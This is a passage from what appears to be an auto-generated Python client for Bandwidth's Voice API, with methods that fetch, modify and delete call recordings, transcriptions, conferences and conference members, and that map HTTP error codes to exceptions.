# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
# Return appropriate type
return ApiResponse(_response)
def modify_call_recording_state(self,
account_id,
call_id,
body):
"""Does a PUT request to /api/v2/accounts/{accountId}/calls/{callId}/recording.
Pauses or resumes a recording.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
body (ModifyCallRecordingRequest): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. Recording
state successfully modified
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recording'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
_request = self.config.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
# Return appropriate type
return ApiResponse(_response)
def get_call_recordings(self,
account_id,
call_id):
"""Does a GET request to /api/v2/accounts/{accountId}/calls/{callId}/recordings.
Returns a (potentially empty) list of metadata for the recordings that
took place during the specified call.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Recordings retrieved successfully
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recordings'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, CallRecordingMetadata.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def get_call_recording(self,
account_id,
call_id,
recording_id):
"""Does a GET request to /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}.
Returns metadata for the specified recording.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
recording_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. Recording
found
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False},
'recordingId': {'value': recording_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, CallRecordingMetadata.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def delete_recording(self,
account_id,
call_id,
recording_id):
"""Does a DELETE request to /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}.
Deletes the specified recording.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
recording_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. The
recording was successfully deleted
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False},
'recordingId': {'value': recording_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare and execute request
_request = self.config.http_client.delete(_query_url)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
# Return appropriate type
return ApiResponse(_response)
def get_download_call_recording(self,
account_id,
call_id,
recording_id):
"""Does a GET request to /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/media.
Downloads the specified recording.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
recording_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. Media
found
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/media'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False},
'recordingId': {'value': recording_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
if (_response.text is not None) or (not str(_response.text)):
decoded = APIHelper.json_deserialize(_response.text)
_result = ApiResponse(_response, body=decoded)
return _result
def delete_recording_media(self,
account_id,
call_id,
recording_id):
"""Does a DELETE request to /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/media.
Deletes the specified recording's media.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
recording_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. The
recording media was successfully deleted
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/media'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False},
'recordingId': {'value': recording_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare and execute request
_request = self.config.http_client.delete(_query_url)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
# Return appropriate type
return ApiResponse(_response)
def get_call_transcription(self,
account_id,
call_id,
recording_id):
"""Does a GET request to /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription.
Downloads the specified transcription.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
recording_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Transcription found
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False},
'recordingId': {'value': recording_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, TranscriptionResponse.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def create_transcribe_call_recording(self,
account_id,
call_id,
recording_id,
body):
"""Does a POST request to /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription.
Requests that the specified recording be transcribed.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
recording_id (string): TODO: type description here.
body (TranscribeRecordingRequest): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Transcription successfully requested
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False},
'recordingId': {'value': recording_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
_request = self.config.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 410:
raise ApiErrorException('The media for this recording has been deleted, so we can\'t transcribe it', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
# Return appropriate type
return ApiResponse(_response)
def delete_call_transcription(self,
account_id,
call_id,
recording_id):
"""Does a DELETE request to /api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription.
Deletes the specified recording's transcription.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
recording_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. The
transcription was successfully deleted
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}/recordings/{recordingId}/transcription'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False},
'recordingId': {'value': recording_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare and execute request
_request = self.config.http_client.delete(_query_url)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
# Return appropriate type
return ApiResponse(_response)
def get_conferences(self,
account_id,
name=None,
min_created_time=None,
max_created_time=None,
page_size=1000,
page_token=None):
"""Does a GET request to /api/v2/accounts/{accountId}/conferences.
Returns information about the conferences in the account.
Args:
account_id (string): TODO: type description here.
name (string, optional): TODO: type description here.
min_created_time (string, optional): TODO: type description here.
max_created_time (string, optional): TODO: type description here.
page_size (int, optional): TODO: type description here. Example:
1000
page_token (string, optional): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Conferences retrieved successfully
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/conferences'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_parameters = {
'name': name,
'minCreatedTime': min_created_time,
'maxCreatedTime': max_created_time,
'pageSize': page_size,
'pageToken': page_token
}
_query_builder = APIHelper.append_url_with_query_parameters(
_query_builder,
_query_parameters
)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, ConferenceState.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def get_conference(self,
account_id,
conference_id):
"""Does a GET request to /api/v2/accounts/{accountId}/conferences/{conferenceId}.
Returns information about the specified conference.
Args:
account_id (string): TODO: type description here.
conference_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Conference found
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/conferences/{conferenceId}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'conferenceId': {'value': conference_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, ConferenceState.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def modify_conference(self,
account_id,
conference_id,
body):
"""Does a POST request to /api/v2/accounts/{accountId}/conferences/{conferenceId}.
Modify the conference state.
Args:
account_id (string): TODO: type description here.
conference_id (string): TODO: type description here.
body (ModifyConferenceRequest): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Conference successfully modified
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/conferences/{conferenceId}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'conferenceId': {'value': conference_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
_request = self.config.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
# Return appropriate type
return ApiResponse(_response)
def modify_conference_member(self,
account_id,
conference_id,
call_id,
body):
"""Does a PUT request to /api/v2/accounts/{accountId}/conferences/{conferenceId}/members/{callId}.
Updates settings for a particular conference member.
Args:
account_id (string): TODO: type description here.
conference_id (string): TODO: type description here.
call_id (string): TODO: type description here.
body (ConferenceMemberState): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Conference member successfully modified
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/conferences/{conferenceId}/members/{callId}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'conferenceId': {'value': conference_id, 'encode': False},
'callId': {'value': call_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
_request = self.config.http_client.put(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
# Return appropriate type
return ApiResponse(_response)
def get_conference_member(self,
account_id,
conference_id,
member_id):
"""Does a GET request to /api/v2/accounts/{accountId}/conferences/{conferenceId}/members/{memberId}.
Returns information about the specified conference member.
Args:
account_id (string): TODO: type description here.
conference_id (string): TODO: type description here.
member_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Conference member found
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/conferences/{conferenceId}/members/{memberId}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'conferenceId': {'value': conference_id, 'encode': False},
'memberId': {'value': member_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, ConferenceMemberState.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def get_conference_recordings(self,
account_id,
conference_id):
"""Does a GET request to /api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings.
Returns a (potentially empty) list of metadata for the recordings that
took place during the specified conference
Args:
account_id (string): TODO: type description here.
conference_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers.
Recordings retrieved successfully
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/conferences/{conferenceId}/recordings'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'conferenceId': {'value': conference_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
